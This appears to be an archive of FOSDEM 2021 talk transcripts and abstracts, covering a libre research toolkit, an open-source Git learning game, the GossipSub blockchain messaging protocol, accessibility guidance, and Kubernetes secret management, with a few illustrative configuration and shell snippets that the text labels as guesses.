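# keysyms and commands are assumptions, not the speaker's real setup.
cat >> "$HOME/.config/i3/config" <<'EOF'
bindsym $mod+Ctrl+z exec --no-startup-id zotero
bindsym $mod+Ctrl+l exec --no-startup-id libreoffice --writer
bindsym $mod+Shift+f exec --no-startup-id firefox
EOF
i3-msg reload   # pick up the new bindings without restarting the session

# Hypothetical shell aliases in the spirit of "tom" and "diss";
# paths are placeholders. Add to ~/.bashrc and re-source the shell.
alias tom='elinks http://localhost/aquinas/opera-omnia/'
alias diss='ranger ~/Documents/dissertation'
```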
Mine is the fact that I am required by circumstances at my home institution to use Microsoft Teams for communication. My historical research and writing software toolkit is 100% Libre. Moreover, it is highly efficient, not despite the fact that, but rather precisely because all of its contents are free and open source software. Being able to customize every piece of software in my toolkit means that I can make it my own multi-source historical research and writing toolkit, specifically optimized for my own scholarly work. For the next few minutes, I will respond to questions. Please feel free to ask anything that you might like to ask. Thank you.
For historical research and writing, the use of a dedicated tiling window manager and other customizable FOSS tools improves efficiency. With a bit of work, manuscript facsimiles, database query tools, and other items that a historian might need to have opened simultaneously can be sorted exactly how he/she wishes, freeing crucial time from organization for proper analysis. In this presentation, I explain how to optimize a multisource historical research workflow inside a tiling window manager with an entirely libre software toolkit.
10.5446/52845 (DOI)
Hey everyone, on the screen to the left you can see a bleep track. I'm Blenri and we want to tell you about a game we're currently building which is about learning Git. What's our motivation? Well some of you already have some experience with Git probably, some of you won't have that and those of you who have some experience may be able to relate to the fact that Git is not easy to get into, right? It has some abstractions that are unusual and the command line interface is kind of inconsistent in some places. So it takes like some work to get into how Git works and how to use it, which is a pity because it's so super useful, right? And it's a core, it has like this very elegant structure of how it works. And like nowadays it's just everywhere you can like really benefit from using it and like when you work in teams to build software and other things. And we think that we want to make it easier for people to get into that of someone's, which is careers into software development or if some young people come into it, yeah we want to empower them basically to use it. That's why we are working on this. And our inspiration are puzzle games like Human Resource Machine, which in this case like teaches low level assembly programming. And yeah that was like the vision we had in mind to build something similar about Git. So this is what we're making. It's like it's open source of course, it's cross platform, you can download it for Linux, Mac and Windows. And as you will see, it's extremely interactive. You can like you have a visualization of how the Git repository looks like internally and you can like pretty directly manipulate it and see what's going on and learn about Git that way. And we also found that it's like very helpful in building some intuition for some other concepts involved like actually like intuitively understanding what the rebase is doing for example. And yeah even ourselves we found that helpful while building this game. So I think people who play this game will get the same effect. We are supported by the Prototype Fund, which is like a German funding program for open source projects. Sponsored by the German Federal Ministry of Education and Research and organized by the Open Knowledge Foundation and we're super glad about having the support. We're currently like four months into the project and we have until the end of February while we're like getting funding from them. And yeah we are really excited to show you what we came up with in the first four months. For building the game we're using the Godot game engine which is also like an open source game engine which we really enjoy and I think it's a pretty good fit for our project. It has a really nice community around it and yeah we're super happy with that. And yeah DeepTrack will show you some of the features in our game and how it does. Yeah let's take a look at some gameplay features and how everything works and looks. So our game is level based so we have a lot of little levels that show some nice concepts and this is the visualization of the Git repository. So the yellow notes you can see are commits and the blue tags are branch graphs in this case. And there's that neat little light blue guy, this is your persona basically and also your head pointer. So this is the main visualization that we use. It's a nice little mixture from physics based ordering and also we take a look at the Git log to get like the better view of the branching. 
And sometimes these branches can get a bit entangled, so you can just grab them and wiggle them around and untangle them if that happens. Yeah, we thought a lot about how we could design a nice entry to Git that is also appealing to people that do not use a terminal or don't want to use a terminal. So we came up with cards, and we took some inspiration from other card based games. So we have these nice little helper cards that are either one Git command or sometimes a combination of different Git commands, and as you can see you can just drag them onto different targets like commits and later on also maybe onto files or refs etc. And this is the overall current look of the game, so you have your visualization, your card deck now on the right side and the description of the level, and you can see your level goals. These can also be multiple entries, and below that is a file explorer and below that is a terminal where you can also type the commands. You don't have to use the cards, you can also type everything, and if you solve levels only by typing and without using the cards you will get a neat extra little badge that shows that you're especially awesome, but it's also totally fine that you use the cards, or use the cards as sort of like a cheat sheet, so you can go back there and remember what that command was. And yeah, the file explorer also has a nice little text editor that you can use without leaving the game. So we thought also a lot about how we could have a nice visualization of the staging process, and this is what we came up with. So you can see three differently colored file symbols. One is like a shadow, that is basically the version that is in your last commit, and the white, topmost file icon, that is your current file in your working directory. So if you make a change you switch from icon A to icon B, so your file has changed and this is why it's sort of levitated. And if you do a staging, or if you stage that file, the purple colored file icon will also rise up to your working directory file, and that shows that this is currently staged, and the shadow always stays the same because this is the last version that you had in your last commit. And yeah, so I already told you about that terminal on the bottom right, and the nice thing is that there's a real bash behind the terminal. So you can basically use all the commands that you are used to using if you are a more experienced user, like you can go with touch and echo and do everything that you maybe want to do, and also inspect a bit more of the Git files if you're interested in that. But we also want to take care that newcomers can't do too much mischief on their own system. So we try to sandbox that at least a little bit, and we also try to implement some of the comfort features like tab completion and suggestions and arrow up to get your last entry in the terminal. Yeah, using Git with other people is I think a super important feature, so we can also use remotes, like in this case on the bottom of the visualization you can see your own repository and on the top is your friend's repository remote, and yeah, you can do pushes and pulls and everything that you also would like to do, and that little green box that you just saw, these are our hints that we currently implemented in our last session so that the game can show you some more information. And yeah, as the last point I would like to show you the level format, because we would be super happy if you are interested in making your own cool levels, and that's super easy.
They are just text files basically, and first you add all the fluff like the title, the description of the level, and you can also set a congrats message that is shown when you solve a level, and then there's also a list of cards. We predefined these cards so that they have nice icons and you can just choose which of the cards should be available in the level. Next there's a list of bash commands to set up your repository, and don't worry, the setup for this level removes the Git repository because by default one was created, and in this case we want the user to create their own again with git init, so this is why we remove everything, and yeah, you can also set up remotes of course. And then the most important part: you want to have win conditions, and you can add a list of conditions basically where you write your own tests and give them a descriptive name so that the player knows what they have to do in the level. And yeah, we hope you enjoy making your own levels with our game. blinry, back to you. Yeah, we already do have some chapters which cover specific topics of Git, like we have an intro for motivation, we talk about file manipulation, how to work with branches, how to do merges, index manipulation, stuff about remotes, stuff about rebase, some mistakes you might make and how to recover from them, yeah, a long chapter about low level stuff and some sandboxes, and like that's our current status. I think like for the future we have planned to add even more content to that, for example we would be really excited to do a chapter about submodules, especially to understand that ourselves better and to be able to explain to people how they work. Yeah, we do have a little story set up in some of these levels which have the theme of time travel, because we thought it might be a good analogy: like when you check out commits then you go back in time and go back to that version, and then like files are objects in the world that you can manipulate and then solve little puzzles or help people with the problems they are having, and we're also really excited to add something like a solarpunk background world to that, so like the synergy of technology and nature and how they can coexist, because we think that's a nice aesthetic and we would love to have that in the game. That's one of the next steps, and yeah, I guess we will do a lot of polishing still. What you saw in the videos are kind of like placeholders, all the graphics, and we plan to go over them and polish them a bit more and also add something like more sound effects; a friend has offered to do some background music, and yeah, that's planned for the future. If you are new to Git, what will you be able to get out of the game? We think it's a pretty fun introduction to Git. We had some playtesting sessions recently with people who are completely new to Git and didn't know anything about it, and we think they really enjoyed themselves exploring these concepts and like the superpowers which Git gives you, and the game as I said helps you build a bit of an intuitive understanding of several things, like what exactly merging is and how it works and what happens when you stage or unstage files, and yeah, because we have this real Git repository attached it gives you some practical knowledge that you can directly use in real projects after that. And if you already know Git and are a more advanced user already, what can you get out of it?
Well, you can take a look at the later chapters which deal with more advanced features, like Git bisect to find some bugs in the past, or sometimes it might be a good idea to patch things up with Git replace. I didn't know about that feature before, but you can take a look at that, and especially if you try to build your own levels we think the game will help you to get like a deep understanding of Git's internals, like understanding what's inside of the .git folder and what this like distributed graph theory tree model that the XKCD is talking about actually means. So yeah, what are we looking for? We would love for you to reach out if any of this resonated with you, especially if you are someone who is interested in like using this game to teach Git to other people, like if you are in education or in some sort of a mentoring role. And also if you just want to test the game and help find some problems with it, no matter what experience level you are at, definitely get in touch. And yeah, as we mentioned, if you now feel excited to build your own level sequence using this game, you can do that; at the URL currently showing we have all the information you need, like links to the GitHub repo and to documentation. Check that out. We are bleeptrack and blinry everywhere, like on Twitter and on Patreon and stuff, and there's also an email address for quick access. And yeah, that's all we got. Thanks for listening. Have a nice FOSDEM. Bye. Bye. Bye. So that was a very nice talk. So let's go over the questions. So when creating the game, did you know about learngitbranching.js.org? Yeah, we knew about it and we did actually a lot of research about some Git learning games, and we also found some older ones that are not active anymore. We also checked out a lot of other coding learning games in general, and yeah. One of the advantages, I guess, is what we missed about Learn Git Branching: having a real Git behind it, right? They kind of reimplement the Git command line interface and then target it to specific operations, like yeah, making branches, rebasing stuff and stuff. And yeah, with our game we like wanted to have a real Git binary behind it where you can actually do everything. And I think that also fits the question of why we don't have a web version currently, because that is the trade off. We were thinking about having a web version, which is a lot more accessible, and also having a real Git repository. And yeah, as we were building with Godot we could do exports for web versions, but that would break all of our Git stuff. So that's currently the trade off we're having. We have thought about having like a virtual machine in the browser that runs Linux and has Git installed. If any of you is really into that, you could definitely look into helping make that happen, and having a web version would be awesome. Yeah, but currently it's like a binary you can download for Linux, Mac and Windows. System requirements are not really high. I think the graphics are very basic and two dimensional. At least we tried it on a super low requirement old Windows tablet and it also ran great. Okay, moving to the next question. Did you decide on a dynamic, physically balanced tree for a special reason? I personally would prefer a static tree with a traceable/predictable look and feel instead of dangling branches. Oh yeah, that's a good point.
We were looking at both options and in the end we went for a dynamic, like a physically simulated tree, because it was easier for us to implement eventually. And we would be interested in your feedback, like, Simon, if you actually want to try the game and notice that it really is a hindrance in some cases, definitely get in touch and we can maybe make it happen to have a static layout. Also a quick note: we will be cut off automatically after the slot ends, so if you're interested in discussing this more, definitely come join our talk room that will be posted by a bot in the chat later. Yeah. Thank you.
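To recap the level format sketched in this talk: a level is a plain text file with some descriptive fields, a list of available cards, a Bash setup block, and named win conditions written as Bash tests. The concrete syntax below is my own guess at what such a file could look like; only the general structure follows the talk, not the game's actual format.

```bash
# Write a hypothetical level file. Field names and section syntax are guesses,
# but the ingredients (title, description, congrats, cards, Bash setup,
# named Bash win conditions) mirror what the talk describes.
cat > my-first-level <<'EOF'
title = Start your own time machine
description = There is no repository here yet. Create one and make a commit!
congrats = Well done, time agent!

cards = init add commit

[setup]
rm -rf .git    # the framework pre-creates a repo; this level wants none

[win: Create a repository]
test -d .git

[win: Make at least one commit]
git rev-parse --verify HEAD
EOF
```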
Git is ubiquitous these days - but it has a pretty steep learning curve! To help people learn how to use it efficiently and intuitively, we're developing an interactive, open-source learning game! It makes heavy use of visualizations, features an (optional) graphical "playing card" interface, and uses real Git repositories under the hood! Storywise, you're a time agent in training, and learn all about how to use your time machine to help people solve their problems. In this talk, we want to introduce you to how the game works, and show you our current progress. We're using the Godot engine, and have a simple, extensible level format based on Bash scripts, which you can use to build your own levels! We want to accomodate both people who are new to Git and the command line, as well as advanced users who are interested in learning more about what's going on under the hood. We'll share what we learned in our playtest sessions, and what's next.
10.5446/52846 (DOI)
Hello everyone, welcome to this talk on GossipSub. I'm very excited to be here. My name is Yanis, I'm a research scientist at Protocol Labs Research and the work I'm going to present is a collaboration between several teams including the Filecoin team, the libp2p team and the Resilient Networks Lab, which is part of Protocol Labs Research. So today's talk is on GossipSub, a secure message propagation protocol for the Filecoin blockchain. And before I go into the details of GossipSub, I would like to spend a few minutes talking about Filecoin, what it is and what it aspires to become. Here is an outline of my talk. I'm going to introduce the Filecoin network, and this is where our talk is going to focus today, but it is worth mentioning that GossipSub is also deployed and currently in use in the Ethereum 2 blockchain. Then I'm going to jump into discussing how important message propagation protocols are for permissionless blockchain networks. I'm going to give a brief outline of the GossipSub protocol, going into details of some of its parts as time permits, and finally I'm going to give you all the details of our extensive evaluation that we did on GossipSub in adversarial environments. So Filecoin is a decentralized storage network for the web3, and not only. It's a peer-to-peer, incentivized and permissionless network where users can earn Filecoin by contributing to the network with extra storage capacity. In the Filecoin network there are three roles. There are the clients that want to hire the network to store their data and pay in Filecoin. There are the miners that contribute storage capacity and store data for the network and its clients, and are then rewarded in Filecoin as a reward for their contribution to the network. Finally there is the network that organizes the work, verifies that no one is misbehaving and rewards miners with Filecoin. This is a more graphic representation of the system, where we have clients that want storage, miners that provide storage and the network that is an intermediary that connects the two. The clients are paying Filecoin and they're agreeing deals with miners to store their data. Miners, what they have to do is store the data and provide proofs that they are indeed storing the data and they're not misbehaving by deleting the data and allocating the storage space to something else. Finally, the network is taking those proofs and making sure that no one is misbehaving, and if they find that no one is misbehaving then they reward miners with Filecoin. The network is trustless and permissionless in the sense that the clients do not have to trust the miners to store their data, since it's the network's job and the algorithmics behind it to do that, and it's also permissionless from the point of view that anyone can start a miner and contribute to the network. Now to do all this, what the Filecoin network uses is a blockchain. The blockchain is used as a currency, it is used to settle market orders, and most importantly it is used for proofs. A proof is a verifiable record of behaviors in the network, and through this proof the network can make sure that basically the miners are keeping up the promise of the deals that they have agreed with clients. Now what is GossipSub and how does it fit in the big picture? GossipSub is a PubSub protocol designed for efficiency and resilience against malicious behaviors in permissionless blockchain environments. Permissionless blockchains are open for anyone to join.
There is no pre-authentication or access control, which further means that pretty much anyone can join the network and attempt to attack or disrupt the operation of the network. This is the problem that we're trying to address by having a secure message propagation protocol. Now in blockchain systems it is very important to avoid network fragmentation and forks. The network has to reach consensus through the verification process, through proofs, and it's also very important, as we know, to keep nodes in sync: every node, every miner in the network needs to have the same view of the state of the network. That's when the blockchain can progress and add more blocks to the network. So a message propagation protocol is needed so that messages, the new blocks that are produced by miners in the network, can propagate to every node in the network to keep them in sync. Now in Filecoin there is an important deadline that we need to keep in mind, and this is at six seconds. So within six seconds of a block being produced, it needs to propagate and reach all other nodes in the network so that in the next round they can start mining the new block on the correct state, so on the correct state of the blockchain up to the previous period. So let's keep this as a takeaway point, the six seconds, because it's an important thing for what our protocol can achieve. Now we've gone back and we've seen with research the vast literature that exists in the area of PubSub protocols, and there has been some great research that has happened in the past. What we have seen though is that security has not been tightly integrated in the protocol, but rather, in past PubSub systems, it has been kind of outsourced to the application layer. So there is, in most cases, a centralized entity that performs security measures, that's access control and all that. So what we did is design some attacks on the network so that we're sure that while PubSub propagates messages in the network, it can inherently identify malicious behavior and get the nodes with malicious behavior out of the network. Of course we started with simple attacks such as the Sybil attack, which is a very common attack in peer-to-peer networks, but we went on to investigate much more sophisticated attacks such as the cold boot attack, and I'm going to explain what it is later on. So I'm going to spend a few minutes talking about what GossipSub actually is, and the main construction in GossipSub is the mesh. So every node in the network is connected to a number of other nodes, which is the degree, in this case 5, and in this case node A is connected to five other nodes. This means that when A produces a new message, a new block, it's going to immediately broadcast it to all those nodes. Those nodes in turn are going to take the message and broadcast it to their own local mesh in the system, and so on. So by doing that, the messages propagate throughout the mesh and that's how the main propagation is done. Now we talked about this degree, and there is a high threshold and a low threshold to this. The high threshold is when the node finds out that there are more nodes connected, more other peers connected to it, and when these go above D high, the upper threshold, the node has to prune some connections, and when it falls below D low, the lower threshold, it has to graft some new nodes. So that's how we settle the degree of the network.
Then we have gossip dissemination, and with gossip dissemination, what we do is, instead of propagating whole messages, which is what happens in the mesh construction, where messages are propagated immediately to all nodes, here we only propagate metadata, and this happens every one second. What we want to do is avoid the situation where all our connections are dominated by Sybil nodes, and what we want to do is reach out to other nodes and bypass any malicious nodes attached to our peer. Now there is a trade-off between the mesh degree and gossip dissemination. The higher the degree of the mesh, the more the traffic, obviously, but the faster a message propagates. On the other hand, when we propagate more gossip but have a lower degree for the mesh, we have less traffic in the network but messages propagate slower. So we need to hit the right balance between these two. Now we went on and tried to integrate some security considerations on top of gossip dissemination. What we did is we came up with a score function. The score function is a function that takes into account several parameters for good or bad behavior, and every node in the network is keeping a score for all other peers it is connected to. So for example, when we see that a message is delivered to our peer from a neighbor and we're receiving this for the first time, then this means that this node is behaving correctly and we increase the score that we have for this node, because it's not trying to delay messages or degrade the performance of the network. On the opposite side, when we have an invalid message that is delivered to our node, then we score the peer we received this message from negatively, we decrease the score, because the node is potentially trying to spam the network with invalid messages. There are several other parameters that we integrate into the score function. Some of them are presented here. It is important to note that nodes do not share this score with other peers, they keep it for themselves. And what do they need it for? We need it for some mitigation strategies. So there is the controlled mesh maintenance, and what this is, is the grafting and pruning of new nodes that I have mentioned before, which we now do based on the score function. So when we want to graft new nodes because D, the degree of our node, has gone to a low value, we only pick the highest scoring nodes of our neighbors. This means that our mesh, our immediate mesh, is formed of honest nodes only and we kick out the malicious nodes. When a node has got a low score or a negative score, then we prune this node immediately. This eventually kicks out all the badly behaving peers from our immediate mesh. We have some other strategies that I don't have time to go through right now. Just to mention flood publishing as a very quick example: when a node is publishing a message, the first hop that it sends to is every other node it has in its connection list, so not only the immediate mesh, but every other peer node. And this is, of course, to avoid the situation where all the mesh connections are malicious users, Sybils that want to silence the node. And in this way, we want to bypass malicious nodes and reach other nodes in the network. We have carried out a very extensive evaluation. We used Testground, which is an emulation platform that we have deployed on AWS. We've run more than 5000 VMs on AWS.
We have considered honest to malicious peers up to a ratio of 1 to 20. Actually, this goes higher, but these are the main test cases. Our metric was the deadline that I mentioned before, the six seconds. So every message needs to reach every other node within six seconds. And of course, we want to have zero packet loss. We compare the performance of GossipSub with the message propagation protocols of Bitcoin and Ethereum 1, where in Bitcoin, every node, every miner, is opening roughly 133 connections and effectively floods all the 133 connections when a new message is produced. In Ethereum 1, in contrast, the network is using a protocol where every node connects to the square root of N, where N is the size of the network. So with current network sizes, when we did the study, that was about 33 connections. And here, what I would like to go a little bit deeper on is a few representative results. So here is a network-wide Eclipse attack, where on the Y-axis we have the CDF of the nodes in the network, so the percentage of nodes that receive the message, and on the X-axis we have the message propagation latency, so how long it took to reach the specific CDF that we have on the Y-axis. We see that GossipSub is basically unaffected by the attack and delivers the message to every node in the network in less than 200 milliseconds. In contrast, Ethereum 1, for example, is totally devastated by the attack and takes more than 10 seconds to propagate the message to all of the network. Obviously, this is something that would completely break the network, especially in the Filecoin case, because we have this six-second deadline that I mentioned earlier. Now, going to the cold boot attack, which is a more sophisticated attack and assumes that when nodes join the network at network launch, the network is dominated by Sybils, and therefore nodes go and connect to Sybils directly. This is a very nasty attack, not necessarily very realistic, but it stretches the protocol to its limits so that we see what happens. What we found was that GossipSub is a little bit affected in this case, and the message propagation goes to 1.2 seconds, but again, we see that all other protocols, including Bitcoin, take much, much longer. Another interesting result from the same scenario is how fast GossipSub can recover the mesh. So we have here the orange nodes that we see in the beginning of the experiment dominate the mesh, and we see that honest nodes, the blue lines, start coming in progressively. We see that within less than 1.5 minutes, the network has completely recovered, and the majority of nodes in the node's mesh is now dominated by honest nodes as opposed to Sybil nodes. So this is a healthy situation for the network because messages can propagate, and nodes do not get silenced. We have done many, many more evaluations. We have hundreds of test cases that we are going to make publicly available so that others can reproduce the results. Of course, our test setup is running the production code, which is also open source and lives on GitHub. So as a summary, the Filecoin network is an exciting, first of its kind, decentralized storage network, and GossipSub is one protocol, the first of its kind, again, to integrate security measures at the protocol layer in order to enhance and support permissionless peer-to-peer networks.
We think that there is going to be much more research and much more development coming around in this area as the momentum of Web3 and decentralized technologies grows. And we think this is a very good first step. I have put some links here on the right-hand side on Filecoin, the website, the blog, the specification, but also GossipSub, the specification of the protocol, as well as a preprint of a paper. So looking forward to more questions and collaborations. Thank you very much and see you soon.
Permissionless blockchain environments necessitate the use of a fast and attack-resilient message propagation protocol for Block and Transaction messages to keep nodes synchronised and avoid forks. We present GossipSub, a gossip-based pubsub protocol, which, in contrast to past pubsub protocols, incorporates resilience against a wide spectrum of attacks. Firstly, GossipSub's mesh construction implements an eager push model which keeps the fan-out of the pubsub delivery low and balances excessive bandwidth consumption against fast message propagation throughout the mesh. Secondly, through gossip dissemination, GossipSub realises a lazy-pull model to reach nodes far away or outside the mesh. Thirdly, through constant observation, nodes maintain a score profile for the peers they are connected to, allowing them to choose the most well-behaved nodes to include in the mesh. Finally, and most importantly, a number of tailor-made mitigation strategies designed specifically for these three components make GossipSub resilient against the most challenging Sybil-based attacks. We test GossipSub in a testbed environment involving more than 5000 VM nodes deployed on AWS and show that it stays immune to all considered attacks. GossipSub is currently being integrated as the main messaging layer protocol in the Filecoin and the Ethereum 2.0 (ETH2.0) blockchains. In this talk we will go through the design details of the GossipSub protocol, discuss its novel points and present a comprehensive performance evaluation study. The talk will serve as a great forum to answer questions and justify the choice of using GossipSub in two of the biggest blockchain networks, namely the Filecoin and ETH2.0 networks.
10.5446/52847 (DOI)
Hi, and welcome to accessibility considerations. My name is Marcia Wilbur, and today I'll be presenting this short lightning talk with my daughter Justina, or Tina. Just as a short intro, I am a developer, Debian. I also do some AIoT development. I like to tinker. I've been a part of this community for about 20 years now, and I'm very community focused. I'm a journalist, a copyright activist, and a chixor. So I'm excited to be able to present this information about accessibility today, and let's get started. I'm going to turn the time over to Tina for a little bit about web accessibility. Hi, my name is Justina Wilbur. I go by Tina. I have mixed connective tissue disease, fibromyalgia, bilateral carpal tunnel, Raynaud's, and degenerative disc disease. We are going to talk about web accessibility considerations for web content. Links. Link text needs to be consistent and descriptive, with the same text used for links that go to the same destination. The link title attribute: its purpose is to offer additional information about the link. Typically, these are less than 80 characters, rarely over 60 characters, but shorter link titles are recommended. Web forms. If you use web forms, remember to have a real label, instructions placed before the form, and clear fields. Make it clear which field an error message is referring to, and give clear errors with how to correct them. Color and contrast. Text color versus background color. Make background colors lighter or font colors darker, so it's easier to see. There are a few tools to check color contrast on websites. Please create or improve some free and open software for contrast auditing. Keyboard only access. I do this a lot because I have a hard time gripping a mouse and using a mouse. I tend to use the tab key to tab over, but sometimes it doesn't work on certain websites. We would like to be able to use the tab key alone, in a logical order. You can set the links and buttons up to work with the enter key to create the best end user experience possible. You can move inside interactive items with the arrow keys and tab. There should be a skip to content link, the first thing you tab onto on the page. Drop-down menus and mouseovers should work with tabs or arrows. That is it. So I want to thank Tina for that information about web accessibility and move on to other considerations. We'll start with video. Remember to include audio and closed captions. So moving on to IoT and hardware. One of the things I wanted to discuss was the IP address that is sometimes located on the module outside of the device or unit. Is there audio also? Is there an alternative way for someone to see that display or get that information from the display? Because that would be very useful. Also during setup, you know, if it's too physically demanding, that could be difficult for some users. So remember ease of use, less setup, more bring up. And include clear instructions, both text and images. So just like a recap here, make sure there are audio and visual considerations, ease of use, and also color blind considerations such as the green LED, right? Remember to design for accessibility. Who is the customer? What is the situation? How can we include everyone? And then of course, now is a good time to focus on accessibility. Again, a recap. Is there a visual only display? Or is there audio also? Is there both? Is the setup demanding? Is the software easy to use and accessibility friendly? And are the instructions clear and accessibility friendly? So to sum it up.
Okay, accessibility, physical reactions and seizures. So there can be physical reactions due to video and animations as well as patterns. So if you're doing video and animation, avoid blinks, flashes, anything 3-30 Hz. Avoid patterns with light and dark contrast, stripes and bars, and some of the reactions range from discomfort all the way up to seizure. So keep these things in consideration. Then reduce the risk by avoiding firework-like videos or high flash rates; strobe lights are another. Avoid black and white patterns and anything with sunlight coming through the blinds or trees. If you're working with virtual reality, then you know it really stimulates your senses. The images flash quickly, your eyes are more focused on the field of view, and there's a possibility a seizure could be triggered. So there's more current information about that at the Epilepsy Society website if you want to go check that out. And again another recap: do you have flickers, flashes, patterns, videos, sunlight, are you using VR? Okay, so this next section is about writing for accessibility in graphics and mobile. So when you write for accessibility, keep accessibility in mind, you want to be clear and concise. You want to avoid using location such as in the upper right hand corner, at the bottom of the page, because when you're using a screen reader, that's not really relevant, it doesn't make a lot of sense, right? You know what I'm saying? And then with colors, you know, something like click the blue button, but there's three buttons. So how do they know which one's blue, if they're color blind or not able to see? So you know, keep these things in consideration. If you're working on a hardware project and you notice there are only different colored LEDs for visual cues, like yellow for warning, green for go, you might want to mention it to the engineering team, you know, just something very FYI like, hey, by the way, I noticed visual items and cues, are there going to be any audio or alternative ways for people to get that information? Okay, when writing for accessibility, remember to use, you know, clear instructions, simplified language, and be careful with colors and visual location. Now you might say, well, how can I have details and simplified language? Just make it easy to read and, you know, avoid the colors and visual location. So infographics are interesting because they're images, right? And how does someone make that more accessible? Well, you can add audio with the image, so maybe a collection or a container that has, you know, that information. But I like to use Steghide and include the transcript. So if you want to learn more about Steghide, it's really interesting. You can embed the file with the image and you can do it with audio as well. So it could be an alternate way of including information. As far as mobile applications, well, if you're using mobile apps, you know, there are some accessibility settings built in for enlargement, contrast, zoom and magnification. And during my research, I discovered that Google has an accessibility app scanner. Now here's the question.
Why does Google have one and we don't? This is an amazing idea, right? Like we could have one just for desktop apps too. It checks different items for accessibility friendliness. Anyways, the types of checks it does are like recording snapshots, secure windows, dialogues, and it scans, it submits the results and it even has an editor for contrast, stores the results, shares the results. I mean, I don't think it would be that difficult to, you know, write a script and throw a little YAD front end on it or something. And here's the conclusion. Okay. So basically with accessibility, you can really pave the path to positivity, right? A little closer to the heart. And these are just recommendations and guidance, not enforceable, not something that, you know, needs to be in compliance or anything. Just goodwill. And starting out as a community, maybe like for me it was about 20 something years ago, like many of our projects seemed more people focused, right? Like how can we create a tool, utility, or app that makes it easier for people to do this or automate this, you know? And let's get back to that, right? And pave a path of positivity for the future. If you have any questions, if you need to reach out to myself or Tina, you can find us online. IRC, you know, all the regular channels. But if you really need some assistance with your project and you don't know where to start with accessibility, you just want to, you know, talk it out or chat it out for a little bit and see what we can do for you. We do have volunteers and we do have information on our website, gnulinux.io. No charge, help the community, help society, help our applications improve. We're all about that. So, thanks. Have a great day. Thank you. Marcia, thank you very much for the talk. And thank you for joining us for the Q&A session today. Thank you. So we have already received several questions. The first item is from Sylvia, and Sylvia asks, even while trying to keep best practices in mind, it is of course possible to miss stuff. Do you have any tips on making it as easy as possible for people to report accessibility-related issues for open source or free software projects? Is GitLab's issue tracker okay or is it not very accessible? What is your opinion on that? So I can give you my opinion on GitLab, but maybe people don't like it. It's a Microsoft product. I don't use it. So, but I could look into it and see how accessible it is. Yeah, I don't really have that answer as far as GitHub and proprietary platforms are concerned, but they might have some information on GitHub about accessibility. Right. The next question is from Sebastian, and Sebastian is asking, do you find that better accessibility partly has the same focus as keyboard enthusiasts? For example, use the mouse as little as possible and make it also work properly just with the keyboard. So being able to use the keyboard is very important for people, not just those who have visual issues, but also those who have limited mobility. I saw someone posted something from Mozilla about accessibility. I thought that's a great resource that you can look to. Yeah, I would say keyboard definitely helps everyone. Thank you, Marcia. Sebastian has asked one more question. I have not used OpenDyslexic, but we do have dyslexics in our family and I definitely want to look into that. And thank you for that. I don't know what happened to Praveen, but I'm going to say this. I'm looking at some of the questions. So yes, I did subtitles.
No, I did not see where on FOSDEM we can import SRT or subtitle files. Let's see. As far as getting back to that limited mobility question, it's not just one-hand usage. Some people have arthritis in both hands, or we even know some quadriplegics. We had a member in my club whose father had Parkinson's. So there are a lot of different limited mobility issues. The talk ends in one minute.
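As a postscript to the steghide suggestion made during the talk, embedding an infographic's transcript inside the image itself, this is roughly how it works on the command line. The file names and passphrase are placeholders, not values from the talk.

```bash
# Embed a plain-text transcript inside an infographic with steghide,
# then extract it again; file names and passphrase are placeholders.
steghide embed -cf infographic.jpg -ef transcript.txt -p 'accessibility'
steghide extract -sf infographic.jpg -p 'accessibility' -xf recovered-transcript.txt
```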
Accessibility considerations for hardware, software and documentation are presented. The presenters are Marcia K Wilbur (developer) and her daughter, Justina Wilbur. Justina was diagnosed several years ago with mixed connective tissue disorder (MS, Lupus, Rheumatoid Arthritis) and has some insights on additional areas for accessibility considerations in software and documentation. Web considerations and recommendations for future tools will be discussed.
10.5446/52848 (DOI)
Welcome to FOSDEM 2021. This talk is about secret management within the context of Kubernetes. You will not have many console configuration outputs, but more of an overview of what is currently available to manage your precious secrets with a Kubernetes platform. Unless you are watching a replay, note that you can interact with the audience and me during this talk using the chat feature. Quick intro about myself. You can call me Ron. That's going to be easier for everyone. I have been working within the storage industry for almost 10 years to make sure data are accessible and secure in all the different meanings of that last word. Then for the last seven years, I have moved to a consulting role helping customers with their automation and container journey. Why secrets within Kubernetes? There are a couple of important key architecture points to take into consideration from a Kubernetes deployment perspective. These need to be addressed before and during implementation and also later on when maintaining the platform. These topics are linked to networking, storage, security, among the most important ones. Networking is mostly related to old legacy concerns and concepts, usually not applying anymore to Kubernetes, but creating useless extra layers of complexity within the infrastructure unless you embrace full software defined networking. Storage is one struggle in many implementations because we need storage, right? Especially in the context of containers. Well, until you discover what it means to have a non-persistent data set in a container and the joy of the famous oops, that goes before and after the question, where is the backup? The last bit is security, which can be anything and a real challenge to discuss with the security team, but most of the time is also a victim of the old legacy governance. While speaking about security, let's zoom in on secret management. So what is a secret? Well, from a generic definition, this is something that you don't want to share with anyone. If you do, this is not a secret anymore, it just became news that will spread around. Within the IT industry, this is a configuration element that could allow you to have access to a restricted resource like a database, an API service, or a device like a server. And this applies to Kubernetes too. One interesting element from a Kubernetes project standpoint is that the design reference for secret management is from 2017, referencing a set of options to handle secrets that did not really change so far. So how do I deal with secrets from a Kubernetes standpoint? Well, there are three different ways to do it. One would be to keep the password within the pods. The second one would be to use the internal Kubernetes Secret resource management. And the last one would be to use an external solution. Let's have a look at those. So within containers, okay, so having a password in containers might be a solution that allows you to do some quick testing, quick hacking. However, this is not a secure approach nor a scalable one, considering that part of the deployment strategy would be to maintain current passwords for different services within containers, either from the deployment definition or within the container image itself. However it would be done, this is a very dangerous path leading to disaster. I can share a very interesting situation where a customer published a container image on Docker Hub with sensitive information related to their company. Remember the oops? Well, this is a big oops.
